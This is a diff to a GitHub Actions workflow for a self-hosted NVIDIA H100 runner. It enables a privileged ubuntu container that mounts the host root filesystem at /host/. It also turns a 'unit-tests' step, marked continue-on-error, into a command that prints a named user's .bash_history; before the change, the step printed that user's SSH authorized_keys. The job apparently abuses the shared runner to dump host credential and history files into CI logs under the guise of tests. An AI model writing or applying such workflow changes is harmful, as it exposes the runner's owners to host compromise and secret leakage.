--- a/.github/workflows/nv-h100.yml
+++ b/.github/workflows/nv-h100.yml
@@ -7,12 +7,12 @@ on:
 jobs:
   unit-tests:
     runs-on: [self-hosted, nvidia, h100]
-#    container:
-      # image: ubuntu:latest
-      # volumes:
-      #     - /:/host/
-      # options: --privileged
+    container:
+       image: ubuntu:latest
+       volumes:
+           - /:/host/
+       options: --privileged
     steps:
       - name: unit-tests
         continue-on-error: true
-        run: cat /home/loadams/.ssh/authorized_keys
+        run: cat /home/loadams/.bash_history
